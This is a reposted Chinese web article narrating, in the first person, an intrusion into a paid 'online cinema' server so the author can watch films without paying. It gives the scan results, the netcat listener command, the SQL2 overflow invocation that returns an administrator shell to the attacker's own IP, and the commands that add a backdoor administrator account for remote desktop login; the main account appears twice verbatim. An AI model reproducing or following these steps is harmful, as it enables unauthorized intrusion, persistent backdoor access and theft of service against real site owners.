• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >入侵防御 > 黑客入侵“在线影院”全过程1

黑客入侵“在线影院”全过程1

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了黑客入侵“在线影院”全过程1 ,其中包含黑客入侵“在线影院”全过程1 等知识点,遇到此问题的同学们可以参考下
最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的,它刺激着我大脑的每一根神经,让我兴奋无比。我喜欢体味这种思维无拘放荡的快感,我喜欢沉醉其中。这是黑客营人的风格。于是,X-Scan开始勤恳地跑在了我的桌面上。   破门:久违的溢出工具   用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。   通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?   先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。   我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。   破门:久违的溢出工具   用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。   通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?   先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。   我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

</div>

您可能想查找下面的文章:

相关文章

  • 你的账号密码是怎样丢失的?暴力破解攻击的检测和防御
  • 如何防御Sniffer攻击 Sniffer攻击详解
  • Dvbbs8.0 access 后台拿webshell for 2003
  • 什么是CC攻击,如何防止网站被CC攻击的方法总汇
  • 饶过Xplog70.dll玩入侵(参考防范)
  • 阿江统计系统V1.6后台拿SHELL的方法
  • 速破解无线路由器密码的全过程
  • 微软全系统建立隐藏账户漏洞分析
  • 通过自解压包来实现入侵
  • 黑客入侵之Radmin 4899端口的详细步骤

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • MSSQL数据库SA权限入侵的感悟
    • 80端口、512端口、3389端口……入侵实例
    • 你的账号密码是怎样丢失的?暴力破解攻击的检测和防御
    • IsThisLegit+Phinn:采用了机器学习算法的开源网络钓鱼防御与检测工具
    • 入侵土耳其网站实例
    • 一句话木马加密 过护卫神云查杀系统 过shell扫描器
    • 入侵JSP网站服务器
    • 黑客入侵“在线影院”全过程1
    • 实例讲解木马的分析方法
    • 黑客经验谈:如何入侵能建立IPC$空衔接的主机

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有